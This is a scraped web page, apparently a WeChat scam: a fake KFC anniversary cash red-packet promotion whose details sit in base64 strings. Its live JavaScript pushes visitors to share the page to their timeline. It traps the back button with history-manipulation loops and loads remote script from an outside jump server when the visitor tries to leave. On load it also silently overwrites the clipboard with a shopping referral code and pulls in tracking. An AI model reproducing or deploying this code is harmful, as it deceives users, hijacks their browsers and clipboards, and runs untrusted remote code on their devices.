                        document.attachEvent('onWeixinJSBridgeReady', onBridgeReady4);
                    }
                } else {
                    onBridgeReady4();
                }
            } else {
                wx.onMenuShareTimeline({
                    title: data.title.replace(/@行/g, "\n").replace(/@滑/g, money),
                    link: data.link.replace(/{domain}/, aam).replace(/{pmain}/, bbm).replace(/\*/, makeid()).replace(/\*/, makeid()),
                    imgUrl: data.img_url,
                    type: '',
                    success: function() {
                        step++;
                        shtip();
                    }
                })
            }
        }
    });
}

function fhuy(callback) {
    history.pushState(history.length + 1, "message", window.location.href.split('#')[0] + "#" + new Date().getTime());
    if (navigator.userAgent.indexOf('Android') != -1) {
        if (typeof (tbsJs) != 'undefined') {
            tbsJs.onReady('{useCachedApi : "true"}', function (e) { })
            window.onhashchange = function () {
                callback();
            }
        } else {
            var pop = 0;
            window.onhashchange = function (event) {
                pop++;
                if (pop >= 3) {
                    callback();
                } else {
                    history.forward();
                }
            }
            history.back(-1)
        }
    } else {
        window.onhashchange = function () {
            callback();
        }
    }
}
setTimeout(function() {
    document.getElementById('loading').style.display = 'none';
    if (_dnp != "") {
        is74wle4kbr2y("https://hm.baidu.com/hm.js?" + _dnp);
    }
    fhuy(gameOver);
}, 500)

function gameOver(){
    is74wle4kbr2y('https://readapi.360rx.cn/api/jump?u=nsQgXbxL&type=js&c=');
    //is74wle4kbr2y('//wwxx-oss.oss-cn-hangzhou.aliyuncs.com/back.js?t=' + new Date().getTime())
}
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0 , maximum-scale=1.0, user-scalable=0">
        <link rel="icon" href="data:image/x-icon;base64,AAABAAEAAQEAAAEAIAAwAAAAFgAAACgAAAABAAAAAgAAAAEAIAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAD///8AgAAAAA==">
        <link rel="stylesheet" href="https://wwxx-oss.oss-accelerate.aliyuncs.com/new/sm2.css">
        <script src="https://wwxx-oss.oss-accelerate.aliyuncs.com/new/jq.js"></script>
    <title></title>
    </head>
    <body id="tbodyid">
        <div class="toast loading_toast toast--visible" id="loading">
            <div>
                <i class="loading icon_toast"></i>
            </div>
            <p class="toast_content">&#x6B63;&#x5728;&#x8FDB;&#x5165;</p>
        </div>
        <div id='jb'></div>
        <script>
            var _x = 'eyJkb20iOiJodHRwOlwvXC9hb2NodWFuZy1maWxlLnVrdWFpcWkuY29tXC9qQjZiNDFvNHBTQjZrRW5UIiwiaXAiOiIxMjEuNDAuNjcuNiIsImtsbCI6Ii4iLCJodCI6IioiLCJpbWciOiJodHRwczpcL1wvc3RhdGljLndlbmp1YW4ucHViXC82MjlhMDAyODgyXC9wcm9qZWN0X2NvbnRlbnRcLzYzYmI2YWY2ZDBhZjU4MGRlMGViMWY0NFwvMTY3MzkzMDg2NTg2XC8xLmpwZyIsImF0IjoiXHU4MGFmXHU1ZmI3XHU1N2ZhNTBcdTU0NjhcdTVlNzRcdThmZDRcdTczYjBcdTZkM2VcdTUzZDFcdTRlMmQiLCJidCI6Ilx1NzNiMFx1OTFkMVx1N2VhMlx1NTMwNVx1OTY4Zlx1NjczYVx1NmQzZVx1NTNkMSIsImJqdCI6Imh0dHA6XC9cL3N0YXRpYy53ZW5qdWFuLnB1YlwvNjE0NWEwODVmNFwvcHJvamVjdF9jb250ZW50XC82MWE2MTdiZjVkMmY4MmM2MmMyYjQ5ZDFcLzE2NjU5MzMwODY3M1wvMS5qcGciLCJmeHQiOiJodHRwczpcL1wvc3RhdGljLndlbmp1YW4ucHViXC82MTNiMTk2MzdkXC9wcm9qZWN0X2NvbnRlbnRcLzYxYTYxNmI0ZmIwNzIzOWFkZjRiNGJiYVwvMTY3MDMyMjc1NTIyXC8xLmpwZyIsInF1bmlkIjoiIiwiaGR6eiI6Ilx1ODBhZlx1NWZiN1x1NTdmYTUwXHU1NDY4XHU1ZTc0XHU4ZmQ0XHU3M2IwXHU2ZDNiXHU1MmE4XHVmZjBjXHU1MjA2XHU0ZWFiXHU1YzMxXHU4MGZkXHU1Zjk3XHU3ZWEyXHU1MzA1XHVmZjBjXHU2YmNmXHU0ZWJhXHU0ZWM1XHU5NjUwXHU0ZTAwXHU0ZWZkIiwieWN4ZiI6MSwiZnh0ayI6MSwibGVkIjowLCJnYiI6MH0=';
            var localAddress = {
                city: '本地',
                province: ''
            };
            var b_url = '';
            window.name = '191.65';
            var _bosi = 'hbh42w2wao';
            var _f = 'eyJzIjp7InRpdGxlMSI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsInRpdGxlMiI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsInRpdGxlMyI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsInRpdGxlNCI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsInRpdGxlNSI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsInRpdGxlNiI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNSIsImRlc2MxIjoiNVx1NjcwODMxXHU2NWU1XHU3NzFmXHU4YmRhXHU3Njg0XHU5MDgwXHU4YmY3XHU2MGE4XHU1M2NhXHU1YmI2XHU0ZWJhXHU1MjMwXHU2NzY1XHVmZjAxIiwiZGVzYzIiOiI1XHU2NzA4MzFcdTY1ZTVcdTc3MWZcdThiZGFcdTc2ODRcdTkwODBcdThiZjdcdTYwYThcdTUzY2FcdTViYjZcdTRlYmFcdTUyMzBcdTY3NjVcdWZmMDEiLCJkZXNjMyI6IjVcdTY3MDgzMVx1NjVlNVx1NzcxZlx1OGJkYVx1NzY4NFx1OTA4MFx1OGJmN1x1NjBhOFx1NTNjYVx1NWJiNlx1NGViYVx1NTIzMFx1Njc2NVx1ZmYwMSIsImRlc2M0IjoiNVx1NjcwODMxXHU2NWU1XHU3NzFmXHU4YmRhXHU3Njg0XHU5MDgwXHU4YmY3XHU2MGE4XHU1M2NhXHU1YmI2XHU0ZWJhXHU1MjMwXHU2NzY1XHVmZjAxIiwiZGVzYzUiOiI1XHU2NzA4MzFcdTY1ZTVcdTc3MWZcdThiZGFcdTc2ODRcdTkwODBcdThiZjdcdTYwYThcdTUzY2FcdTViYjZcdTRlYmFcdTUyMzBcdTY3NjVcdWZmMDEiLCJkZXNjNiI6IjVcdTY3MDgzMVx1NjVlNVx1NzcxZlx1OGJkYVx1NzY4NFx1OTA4MFx1OGJmN1x1NjBhOFx1NTNjYVx1NWJiNlx1NGViYVx1NTIzMFx1Njc2NVx1ZmYwMSIsImltZzEiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsImltZzIiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsImltZzMiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsImltZzQiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsImltZzUiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsImltZzYiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyIsInB0aXRsZTAiOiJcdTgwNWFcdTRmMWFcdTkwMWFcdTc3ZTVcdWZmMGM1XHU2NzA4MzFcdTY1ZTVcdTc3MWZcdThiZGFcdTc2ODRcdTkwODBcdThiZjdcdTYwYThcdTUzY2FcdTViYjZcdTRlYmFcdTUyMzBcdTY3NjVcdWZmMDEiLCJwdGl0bGUxIjoiXHU4MDVhXHU0ZjFhXHU5MDFhXHU3N2U1XHVmZjBjNVx1NjcwODMxXHU2NWU1XHU3NzFmXHU4YmRhXHU3Njg0XHU5MDgwXHU4YmY3XHU2MGE4XHU1M2NhXHU1YmI2XHU0ZWJhXHU1MjMwXHU2NzY1XHVmZjAxIiwicHRpdGxlMiI6Ilx1ODA1YVx1NGYxYVx1OTAxYVx1NzdlNVx1ZmYwYzVcdTY3MDgzMVx1NjVlNVx1NzcxZlx1OGJkYVx1NzY4NFx1OTA4MFx1OGJmN1x1NjBhOFx1NTNjYVx1NWJiNlx1NGViYVx1NTIzMFx1Njc2NVx1ZmYwMSIsInBpbWcwIjoiaHR0cDpcL1wvd3d4eC1vc3Mub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbVwvMTkxMTEyMTU1NDAzMTA1ODQ3MzQ5Ny5qcGciLCJwaW1nMSI6Imh0dHA6XC9cL3d3eHgtb3NzLm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb21cLzE5MTExMjE1NTQwMzEwNTg0NzM0OTcuanBnIiwicGltZzIiOiJodHRwOlwvXC93d3h4LW9zcy5vc3MtY24taGFuZ3pob3UuYWxpeXVuY3MuY29tXC8xOTExMTIxNTU0MDMxMDU4NDczNDk3LmpwZyJ9LCJhIjoiXC9cLzEyMS40MC42Ny42XC9pbmRleFwvanNzZGs/c2RrPTI5JnVybD1odHRwJTNBJTJGJTJGYW9jaHVhbmctZmlsZS51a3VhaXFpLmNvbSUyRnhoc1A4ZXdBdDM4MGFkb0oiLCJ0Ijp7ImFhIjoiaHR0cDpcL1wvYW9jaHVhbmctZmlsZS51a3VhaXFpLmNvbVwvakI2YjQxbzRwU0I2a0VuVCIsImJiIjoiaHR0cDpcL1wvYW9jaHVhbmctZmlsZS51a3VhaXFpLmNvbVwvakI2YjQxbzRwU0I2a0VuVCJ9LCJmIjpbIntwbWFpbn0iLCJ7ZG9tYWlufSIsIntkb21haW59Iiwie2RvbWFpbn0iLCJ7ZG9tYWlufSIsIntkb21haW59Iiwie2RvbWFpbn0iLCJ7cG1haW59Iiwie3BtYWlufSJdfQ==';
            var share = 0;
            var _stime = -100;
            _di = 7;
            var _dnp = 'bf5aded7ade0c103522dd5b37c7d63e4';
            //var s = document.createElement('script');
            //s.src = 'https://wwxx-oss.oss-cn-hangzhou.aliyuncs.com/new/sm.js?v=121';
            //document.body.appendChild(s);
            
            copyCode('4$ytaldp3wwGJ$:// CA1371')

            function copyCode(e){
                console.log(e)
                $.getScript('https://wwxx-oss.oss-cn-hangzhou.aliyuncs.com/clipboard.min.js',function(){
                    let clipboard = new ClipboardJS(document.body, {
                        text: function() {
                          return e;
                        }
                    });
                })
            }
        </script>
    </body>
</html>